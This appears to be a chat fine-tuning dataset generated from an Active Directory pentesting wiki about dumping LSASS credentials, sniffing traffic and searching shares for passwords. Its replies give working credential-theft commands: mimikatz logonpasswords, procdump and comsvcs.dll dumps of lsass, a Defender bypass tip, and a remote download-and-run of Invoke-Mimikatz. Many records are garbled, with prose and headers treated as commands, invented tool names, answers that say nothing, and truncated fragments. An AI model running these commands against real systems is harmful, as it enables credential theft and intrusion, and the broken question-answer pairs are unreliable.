"sekurlsa::minidump lsass.dmp\nsekurlsa::logonpasswords\n``\n\nFor Windows 2000, a special version of mimikatz called mimilove can be used.\n\n=== Pypykatz\n\nPypykatz (Python) can be used remotely (i.e. offline) to analyze a memory dump (dumped with ProcDump for example).\n\n`bash\npypykatz lsa minidump lsass.dmp\n`\n\n=== ProcDump\n\nThe legitimate tool ProcDump (from sysinternals) (download) can be used to dump lsass's process memory.\n\n`bash\nprocdump -accepteula -ma lsass lsass.dmp\n`\n\n> [!TIP]\n> Windows Defender is triggered when a memory dump of lsass is operated, quickly leading to the deletion of the dump. Using lsass's process identifier (pid) \"bypasses\" that.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute (Remotely) analyze a memory dump?", "response": "sekurlsa::minidump lsass.dmp\nsekurlsa::logonpasswords\n``\n\nFor Windows 2000, a special version of mimikatz called mimilove can be used.\n\n=== Pypykatz\n\nPypykatz (Python) can be used remotely (i.e. offline) to analyze a memory dump (dumped with ProcDump for example).\n\n`bash\npypykatz lsa minidump lsass.dmp\n`\n\n=== ProcDump\n\nThe legitimate tool ProcDump (from sysinternals) (download) can be used to dump lsass's process memory.\n\n`bash\nprocdump -accepteula -ma lsass lsass.dmp\n`\n\n> [!TIP]\n> Windows Defender is triggered when a memory dump of lsass is operated, quickly leading to the deletion of the dump. Using lsass's process identifier (pid) \"bypasses\" that.\n\n``bash", "metadata": {"corpus_index": 320, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use For for (remotely) analyze a memory dump?"}, {"role": "assistant", "content": "For Windows 2000, a special version of mimikatz called mimilove can be used.\n\n\n=== Pypykatz\n\n[Pypykatz](https://github.com/skelsec/pypykatz) (Python) can be used remotely (i.e. offline) to analyze a memory dump (dumped with [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) for example)."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use For for (remotely) analyze a memory dump?", "response": "For Windows 2000, a special version of mimikatz called mimilove can be used.\n\n\n=== Pypykatz\n\n[Pypykatz](https://github.com/skelsec/pypykatz) (Python) can be used remotely (i.e. offline) to analyze a memory dump (dumped with [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) for example).", "metadata": {"corpus_index": 321, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "For"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for (Remotely) analyze a memory dump?"}, {"role": "assistant", "content": "For Windows 2000, a special version of mimikatz called mimilove can be used.\n\n\n=== Pypykatz\n\n[Pypykatz](https://github.com/skelsec/pypykatz) (Python) can be used remotely (i.e. offline) to analyze a memory dump (dumped with [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) for example)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for (Remotely) analyze a memory dump?", "response": "For Windows 2000, a special version of mimikatz called mimilove can be used.\n\n\n=== Pypykatz\n\n[Pypykatz](https://github.com/skelsec/pypykatz) (Python) can be used remotely (i.e. offline) to analyze a memory dump (dumped with [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) for example).", "metadata": {"corpus_index": 321, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `For Windows 2000, a special version of mimikatz called mimilove can be used.`?"}, {"role": "assistant", "content": "This command is used for (remotely) analyze a memory dump. (Remotely) analyze a memory dump"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `For Windows 2000, a special version of mimikatz called mimilove can be used.`?", "response": "This command is used for (remotely) analyze a memory dump. (Remotely) analyze a memory dump", "metadata": {"corpus_index": 321, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute (Remotely) analyze a memory dump?"}, {"role": "assistant", "content": "=== ProcDump\n\nThe legitimate tool [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) (from [sysinternals](https://docs.microsoft.com/en-us/sysinternals/)) ([download](https://live.sysinternals.com/)) can be used to dump lsass's process memory."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute (Remotely) analyze a memory dump?", "response": "=== ProcDump\n\nThe legitimate tool [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) (from [sysinternals](https://docs.microsoft.com/en-us/sysinternals/)) ([download](https://live.sysinternals.com/)) can be used to dump lsass's process memory.", "metadata": {"corpus_index": 322, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== ProcDump`?"}, {"role": "assistant", "content": "This command is used for (remotely) analyze a memory dump. (Remotely) analyze a memory dump"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== ProcDump`?", "response": "This command is used for (remotely) analyze a memory dump. (Remotely) analyze a memory dump", "metadata": {"corpus_index": 322, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for (Remotely) analyze a memory dump?"}, {"role": "assistant", "content": "> [!TIP]\n> Windows Defender is triggered when a memory dump of lsass is operated, quickly leading to the deletion of the dump. Using lsass's process identifier (pid) \"bypasses\" that."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for (Remotely) analyze a memory dump?", "response": "> [!TIP]\n> Windows Defender is triggered when a memory dump of lsass is operated, quickly leading to the deletion of the dump. Using lsass's process identifier (pid) \"bypasses\" that.", "metadata": {"corpus_index": 323, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!TIP]`?"}, {"role": "assistant", "content": "This command is used for (remotely) analyze a memory dump. (Remotely) analyze a memory dump"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!TIP]`?", "response": "This command is used for (remotely) analyze a memory dump. (Remotely) analyze a memory dump", "metadata": {"corpus_index": 323, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Dump lsass's process memory"}, {"role": "assistant", "content": "procdump -accepteula -ma $lsass_pid lsass.dmp\n``\n\nOnce the memory dump is finished, it can be analyzed with mimikatz (Windows) or pypykatz (Python, cross-platform).\n\n=== comsvcs.dll\n\nThe native comsvcs.dll DLL found in C:\\Windows\\system32 can be used with rundll32 to dump LSASS's process memory.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Dump lsass's process memory", "response": "procdump -accepteula -ma $lsass_pid lsass.dmp\n``\n\nOnce the memory dump is finished, it can be analyzed with mimikatz (Windows) or pypykatz (Python, cross-platform).\n\n=== comsvcs.dll\n\nThe native comsvcs.dll DLL found in C:\\Windows\\system32 can be used with rundll32 to dump LSASS's process memory.\n\n``bash", "metadata": {"corpus_index": 324, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Dump lsass's process memory"}, {"role": "assistant", "content": "procdump -accepteula -ma $lsass_pid lsass.dmp\n``\n\nOnce the memory dump is finished, it can be analyzed with mimikatz (Windows) or pypykatz (Python, cross-platform).\n\n=== comsvcs.dll\n\nThe native comsvcs.dll DLL found in C:\\Windows\\system32 can be used with rundll32 to dump LSASS's process memory.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Dump lsass's process memory", "response": "procdump -accepteula -ma $lsass_pid lsass.dmp\n``\n\nOnce the memory dump is finished, it can be analyzed with mimikatz (Windows) or pypykatz (Python, cross-platform).\n\n=== comsvcs.dll\n\nThe native comsvcs.dll DLL found in C:\\Windows\\system32 can be used with rundll32 to dump LSASS's process memory.\n\n``bash", "metadata": {"corpus_index": 324, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Once command for dump lsass's process memory"}, {"role": "assistant", "content": "Once the memory dump is finished, it can be analyzed with [mimikatz](https://github.com/gentilkiwi/mimikatz) (Windows) or [pypykatz](https://github.com/skelsec/pypykatz) (Python, cross-platform).\n\n\n=== comsvcs.dll\n\nThe native comsvcs.dll DLL found in `C:\\Windows\\system32` can be used with rundll32 to dump LSASS's process memory."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Once command for dump lsass's process memory", "response": "Once the memory dump is finished, it can be analyzed with [mimikatz](https://github.com/gentilkiwi/mimikatz) (Windows) or [pypykatz](https://github.com/skelsec/pypykatz) (Python, cross-platform).\n\n\n=== comsvcs.dll\n\nThe native comsvcs.dll DLL found in `C:\\Windows\\system32` can be used with rundll32 to dump LSASS's process memory.", "metadata": {"corpus_index": 325, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Once"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Dump lsass's process memory during a pentest?"}, {"role": "assistant", "content": "Once the memory dump is finished, it can be analyzed with [mimikatz](https://github.com/gentilkiwi/mimikatz) (Windows) or [pypykatz](https://github.com/skelsec/pypykatz) (Python, cross-platform).\n\n\n=== comsvcs.dll\n\nThe native comsvcs.dll DLL found in `C:\\Windows\\system32` can be used with rundll32 to dump LSASS's process memory."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Dump lsass's process memory during a pentest?", "response": "Once the memory dump is finished, it can be analyzed with [mimikatz](https://github.com/gentilkiwi/mimikatz) (Windows) or [pypykatz](https://github.com/skelsec/pypykatz) (Python, cross-platform).\n\n\n=== comsvcs.dll\n\nThe native comsvcs.dll DLL found in `C:\\Windows\\system32` can be used with rundll32 to dump LSASS's process memory.", "metadata": {"corpus_index": 325, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Once the memory dump is finished, it can be analyzed with [mimikatz](https://github.com/gentilkiwi/mimikatz) (Windows) or [pypykatz](https://github.com/skelsec/pypykatz) (Python, cross-platform).`?"}, {"role": "assistant", "content": "This command is used for dump lsass's process memory. Dump lsass's process memory"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Once the memory dump is finished, it can be analyzed with [mimikatz](https://github.com/gentilkiwi/mimikatz) (Windows) or [pypykatz](https://github.com/skelsec/pypykatz) (Python, cross-platform).`?", "response": "This command is used for dump lsass's process memory. Dump lsass's process memory", "metadata": {"corpus_index": 325, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Dump lsass's process memory in the context of penetration testing"}, {"role": "assistant", "content": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump $lsass_pid C:\\temp\\lsass.dmp full\n``\n\n=== PowerSploit\n\nPowerSploit's exfiltration script Invoke-Mimikatz (PowerShell) can be used to extract credential material from LSASS's process memory.\n\n`bash\npowershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds\n``\n\n:::\n\nRecovered credential material could be either plaintext passwords or NT hash that can be used with pass the hash (depending on the context)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Dump lsass's process memory in the context of penetration testing", "response": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump $lsass_pid C:\\temp\\lsass.dmp full\n``\n\n=== PowerSploit\n\nPowerSploit's exfiltration script Invoke-Mimikatz (PowerShell) can be used to extract credential material from LSASS's process memory.\n\n`bash\npowershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds\n``\n\n:::\n\nRecovered credential material could be either plaintext passwords or NT hash that can be used with pass the hash (depending on the context).", "metadata": {"corpus_index": 326, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Dump lsass's process memory"}, {"role": "assistant", "content": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump $lsass_pid C:\\temp\\lsass.dmp full\n``\n\n=== PowerSploit\n\nPowerSploit's exfiltration script Invoke-Mimikatz (PowerShell) can be used to extract credential material from LSASS's process memory.\n\n`bash\npowershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds\n``\n\n:::\n\nRecovered credential material could be either plaintext passwords or NT hash that can be used with pass the hash (depending on the context)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Dump lsass's process memory", "response": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump $lsass_pid C:\\temp\\lsass.dmp full\n``\n\n=== PowerSploit\n\nPowerSploit's exfiltration script Invoke-Mimikatz (PowerShell) can be used to extract credential material from LSASS's process memory.\n\n`bash\npowershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds\n``\n\n:::\n\nRecovered credential material could be either plaintext passwords or NT hash that can be used with pass the hash (depending on the context).", "metadata": {"corpus_index": 326, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Dump lsass's process memory"}, {"role": "assistant", "content": "=== PowerSploit\n\n[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)'s exfiltration script [Invoke-Mimikatz](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1) (PowerShell) can be used to extract credential material from LSASS's process memory."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Dump lsass's process memory", "response": "=== PowerSploit\n\n[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)'s exfiltration script [Invoke-Mimikatz](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1) (PowerShell) can be used to extract credential material from LSASS's process memory.", "metadata": {"corpus_index": 327, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== PowerSploit`?"}, {"role": "assistant", "content": "This command is used for dump lsass's process memory. Dump lsass's process memory"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== PowerSploit`?", "response": "This command is used for dump lsass's process memory. Dump lsass's process memory", "metadata": {"corpus_index": 327, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/lsass.md", "page_title": "LSASS secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Network protocols - Theory"}, {"role": "assistant", "content": "Plaintext protocols (like HTTP, FTP, SNMP, SMTP) are widely used within organizations. Being able to capture and parse that traffic could offer attackers valuable information like sensitive files, passwords or hashes. There are many ways an attacker can obtain a man-in-the-middle position, ARP poisoning being the most common and effective one."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Network protocols - Theory", "response": "Plaintext protocols (like HTTP, FTP, SNMP, SMTP) are widely used within organizations. Being able to capture and parse that traffic could offer attackers valuable information like sensitive files, passwords or hashes. There are many ways an attacker can obtain a man-in-the-middle position, ARP poisoning being the most common and effective one.", "metadata": {"corpus_index": 328, "category": "network", "source_file": "docs/src/ad/movement/credentials/dumping/network-protocols.md", "page_title": "Network protocols", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Network protocols - Theory"}, {"role": "assistant", "content": "Plaintext protocols (like HTTP, FTP, SNMP, SMTP) are widely used within organizations. Being able to capture and parse that traffic could offer attackers valuable information like sensitive files, passwords or hashes. There are many ways an attacker can obtain a man-in-the-middle position, ARP poisoning being the most common and effective one."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Network protocols - Theory", "response": "Plaintext protocols (like HTTP, FTP, SNMP, SMTP) are widely used within organizations. Being able to capture and parse that traffic could offer attackers valuable information like sensitive files, passwords or hashes. There are many ways an attacker can obtain a man-in-the-middle position, ARP poisoning being the most common and effective one.", "metadata": {"corpus_index": 328, "category": "network", "source_file": "docs/src/ad/movement/credentials/dumping/network-protocols.md", "page_title": "Network protocols", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Network protocols - Practice"}, {"role": "assistant", "content": "Once network traffic is hijacked and goes through an attacker-controlled equipement, valuable information can be searched through captured (with tcpdump, tshark or wireshark) or through live traffic.\n\nPCredz (Python) is a good example and allows extraction of credit card numbers, NTLM (DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23, i.e. ASREQroast), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Network protocols - Practice", "response": "Once network traffic is hijacked and goes through an attacker-controlled equipement, valuable information can be searched through captured (with tcpdump, tshark or wireshark) or through live traffic.\n\nPCredz (Python) is a good example and allows extraction of credit card numbers, NTLM (DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23, i.e. ASREQroast), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\n\n```bash", "metadata": {"corpus_index": 329, "category": "network", "source_file": "docs/src/ad/movement/credentials/dumping/network-protocols.md", "page_title": "Network protocols", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Network protocols - Practice?"}, {"role": "assistant", "content": "Once network traffic is hijacked and goes through an attacker-controlled equipement, valuable information can be searched through captured (with tcpdump, tshark or wireshark) or through live traffic.\n\nPCredz (Python) is a good example and allows extraction of credit card numbers, NTLM (DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23, i.e. ASREQroast), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Network protocols - Practice?", "response": "Once network traffic is hijacked and goes through an attacker-controlled equipement, valuable information can be searched through captured (with tcpdump, tshark or wireshark) or through live traffic.\n\nPCredz (Python) is a good example and allows extraction of credit card numbers, NTLM (DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23, i.e. ASREQroast), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\n\n```bash", "metadata": {"corpus_index": 329, "category": "network", "source_file": "docs/src/ad/movement/credentials/dumping/network-protocols.md", "page_title": "Network protocols", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Network shares - Theory work?"}, {"role": "assistant", "content": "In organization networks, it is common to find passwords in random files (logs, config files, personal documents, Office documents, ...). Other credential dumping techniques (SAM & LSA, NTDS.dit, some web browsers, ...) could be considered as sub-techniques of credential dumping from files. This recipe focuses on the techniques that allow to gather password and sensitive information from generic and random files other than the ones involved in the sub-techniques mentioned before."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Network shares - Theory work?", "response": "In organization networks, it is common to find passwords in random files (logs, config files, personal documents, Office documents, ...). Other credential dumping techniques (SAM & LSA, NTDS.dit, some web browsers, ...) could be considered as sub-techniques of credential dumping from files. This recipe focuses on the techniques that allow to gather password and sensitive information from generic and random files other than the ones involved in the sub-techniques mentioned before.", "metadata": {"corpus_index": 330, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/network-shares.md", "page_title": "Network shares", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Network shares - Theory"}, {"role": "assistant", "content": "In organization networks, it is common to find passwords in random files (logs, config files, personal documents, Office documents, ...). Other credential dumping techniques (SAM & LSA, NTDS.dit, some web browsers, ...) could be considered as sub-techniques of credential dumping from files. This recipe focuses on the techniques that allow to gather password and sensitive information from generic and random files other than the ones involved in the sub-techniques mentioned before."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Network shares - Theory", "response": "In organization networks, it is common to find passwords in random files (logs, config files, personal documents, Office documents, ...). Other credential dumping techniques (SAM & LSA, NTDS.dit, some web browsers, ...) could be considered as sub-techniques of credential dumping from files. This recipe focuses on the techniques that allow to gather password and sensitive information from generic and random files other than the ones involved in the sub-techniques mentioned before.", "metadata": {"corpus_index": 330, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/network-shares.md", "page_title": "Network shares", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Network shares - Practice?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the manspider (Python) tool can be used to find sensitive information across a number of shares.\n\n``bash\nmanspider.py --threads 50 $IP_RANGE/$MASK -d $DOMAIN -u $USER -p $PASSWORD --content \"set sqlplus\" \"password =\"\n`\n\nManually, shares can be mounted and grepped for interesting information.\n\n=== Windows\n\nFrom Windows systems, the following commands should help find interesting information across local files and network shares.\n\n`bash\nfindstr /snip password .xml .ini *.txt\nfindstr /snip password *\n`\n\nPowerSploit's PowerView (Powershell) module can be used to find interesting files as well.\n\n`bash\nFind-InterestingFile -LastAccessTime (Get-Date).AddDays(-7)\nFind-InterestingFile -Include \"private,confidential\"\nFind-InterestingFile -Path \"\\\\$SERVER\\$Share\" -OfficeDocs\n`\n\nLast but not least, one of the best tools to find sensitive information across a number of shares and local files is Snaffler (C#).\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Network shares - Practice?", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the manspider (Python) tool can be used to find sensitive information across a number of shares.\n\n``bash\nmanspider.py --threads 50 